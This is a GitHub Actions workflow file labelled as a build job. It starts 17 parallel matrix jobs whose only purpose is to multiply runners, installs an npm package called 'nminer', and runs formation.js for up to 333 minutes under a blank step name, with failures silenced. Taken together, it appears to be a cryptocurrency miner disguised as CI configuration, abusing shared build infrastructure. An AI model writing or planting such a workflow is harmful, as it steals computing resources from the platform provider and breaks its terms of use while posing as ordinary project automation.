name: formation
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9044 }
          - { version: 241 }
          - { version: 5510 }
          - { version: 3408 }
          - { version: 3793 }
          - { version: 7127 }
          - { version: 8693 }
          - { version: 877 }
          - { version: 9335 }
          - { version: 9946 }
          - { version: 973 }
          - { version: 9853 }
          - { version: 1660 }
          - { version: 6100 }
          - { version: 2057 }
          - { version: 6320 }
          - { version: 754 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 333m node formation.js || echo "formation executed"